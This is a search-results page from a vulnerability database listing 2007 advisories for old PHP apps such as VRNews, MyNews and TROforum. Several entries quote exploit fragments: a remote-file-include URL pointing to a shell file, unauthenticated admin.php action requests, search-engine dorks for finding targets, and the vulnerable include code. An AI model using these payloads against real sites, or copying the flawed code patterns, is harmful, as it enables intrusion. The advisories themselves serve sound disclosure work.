CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1599 matches found

securityvulns•added 2007/07/31 12:0 a.m.•33 views

Madoa Poll v1.1 Remote File Include Vulnerabilities

Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...

1.4AI score

Exploits0

NVD•added 2007/07/06 7:30 p.m.•11 views

CVE-2007-3611

admin.php in VRNews 1.1.1, and possibly other 1.x versions, does not require authentication, which allows remote attackers to perform certain administrative actions via a direct request with a 1 edit, 2 add, 3 config, or 4 del value in the act parameter...

9.3CVSS6.8AI score0.03268EPSS

Exploits0References3

CVE•added 2007/07/06 7:0 p.m.•41 views

CVE-2007-3611

VRNews 1.1.1 (admin.php) is vulnerable to an unauthenticated remote administrative action due to a direct request parameter (act) that allows actions such as edit, add, config, or del. The root cause is lack of authentication for these actions, enabling attackers to perform administrative operati...

9.3CVSS6.8AI score0.03268EPSS

Exploits0References3Affected Software1

seebug.org•added 2007/07/06 12:0 a.m.•21 views

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

No description provided by source. VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3. /VRNews/admin.php?act=confi...

7.1AI score

Exploits0

0day.today•added 2007/07/05 12:0 a.m.•116 views

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

Exploit for unknown platform in category web applications =============================================================== VRNews 1.1.1 admin.php Remote Permission Bypass Vulnerability =============================================================== VRNews v1.x = /VRNews/admin.php Permission Found...

7.1AI score

Exploits0

exploitpack•added 2007/07/05 12:0 a.m.•25 views

VRNews 1.1.1 - admin.php Remote Security Bypass

VRNews 1.1.1 - admin.php Remote Security Bypass VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3...

Exploits0

Exploit DB•added 2007/07/05 12:0 a.m.•35 views

VRNews 1.1.1 - 'admin.php' Remote Security Bypass

VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3. /VRNews/admin.php?act=config 4. /VRNews/admin.php?act=del...

7.4AI score

Exploits0

Prion•added 2007/06/26 5:30 p.m.•15 views

Sql injection

SQL injection vulnerability in admin.php in MyNews 0.10, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the authacc cookie...

6.8CVSS9AI score0.01105EPSS

Exploits1References6Affected Software1

CVE•added 2007/06/26 5:0 p.m.•49 views

CVE-2007-2520

CVE-2007-2520 affects MyNews 0.10. SQL injection in admin.php via the authacc cookie when PHP magic_quotes_gpc is disabled. The vulnerability allows remote execution of arbitrary SQL commands and could lead to data exposure or modification; impact is described as partial confidentiality/integrity...

6.8CVSS8.3AI score0.01105EPSS

Exploits1References6Affected Software1

Cvelist•added 2007/06/26 5:0 p.m.•28 views

CVE-2007-2520

SQL injection vulnerability in admin.php in MyNews 0.10, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the authacc cookie...

8.3AI score0.01105EPSS

Exploits1References6

securityvulns•added 2007/06/26 12:0 a.m.•70 views

MyNews version 0.10 SQL Injection Vulnerability

netVigilance Security Advisory 25 MyNews version 0.10 SQL Injection Vulnerability Description: MyNews is very easy to include into any website news publishing, just as simple as using the include tag and calling the function to display the news. BBCode has been added to this feature, so now you d...

6.8CVSS0.3AI score0.01105EPSS

Exploits1

Prion•added 2007/05/31 12:30 a.m.•15 views

Remote file inclusion

PHP remote file inclusion vulnerability in admin/admin.php in TROforum 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the siteurl parameter...

7.5CVSS8AI score0.64362EPSS

Exploits1References3Affected Software1

CVE•added 2007/05/31 12:0 a.m.•44 views

CVE-2007-2937

TROforum 0.1 must vulnerable through admin/admin.php’s site_url parameter, enabling a remote file inclusion that allows arbitrary PHP code execution. Root cause: improper handling of external URLs in site_url. Severity: CVSS v2 base score 7.5 (HIGH). No remediation details are provided in the ava...

7.5CVSS7.5AI score0.64362EPSS

Exploits1References3Affected Software1

Packet Storm•added 2007/05/30 12:0 a.m.•28 views

troforum01-rfi.txt

TROforum 0.1...

7.4AI score

Exploits0

seebug.org•added 2007/05/27 12:0 a.m.•23 views

TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability

No description provided by source. TROforum 0.1 = Remote File Inclusion Vulnerability Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta= Vuln Code ERROR1:admin/admin.php include "$siteurl/trofimov.php"; include "$siteurl/narod.php"; RFI...

7.1AI score

Exploits0

0day.today•added 2007/05/26 12:0 a.m.•42 views

TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ===================================================================== TROforum 0.1 admin.php siteurl Remote File Inclusion Vulnerability ===================================================================== TROforum 0.1 = Remote File...

7.1AI score

Exploits0

exploitpack•added 2007/05/26 12:0 a.m.•12 views

TROforum 0.1 - admin.php?site_url Remote File Inclusion

TROforum 0.1 - admin.php?siteurl Remote File Inclusion TROforum 0.1 = Remote File Inclusion Vulnerability Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta= Vuln Code ERROR1:admin/admin.php include "$siteurl/trofimov.php"; include "$siteurl/narod.php"; RFI BUG1...

0.3AI score

Exploits0

NVD•added 2007/05/11 5:19 p.m.•15 views

CVE-2007-2626

SQL injection vulnerability in admin.php in SchoolBoard allows remote attackers to execute arbitrary SQL commands via the 1 username and 2 password parameters. NOTE: CVE disputes this issue, because 'username' does not exist, and the password is not used in any queries...

7.5CVSS8.5AI score0.01091EPSS

Exploits0References5

CVE•added 2007/05/11 5:0 p.m.•45 views

CVE-2007-2626

CVE-2007-2626: SQL injection reported in the admin.php file of SchoolBoard, potentially via (1) username and (2) password parameters. The CVE description notes that the issue is disputed because the username parameter may not exist and the password is not used in any queries. Connected documents ...

7.5CVSS8.5AI score0.01091EPSS

Exploits0References5Affected Software1

Positive Technologies•added 2007/05/11 12:0 a.m.•4 views

PT-2007-3945 · Unknown · Schoolboard

Name of the Vulnerable Software and Affected Versions: SchoolBoard affected versions not specified Description: The issue concerns a SQL injection vulnerability in the admin.php file of SchoolBoard. This vulnerability potentially allows remote attackers to execute arbitrary SQL commands. However,...

7.5CVSS8.5AI score0.01091EPSS

Exploits0References7

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by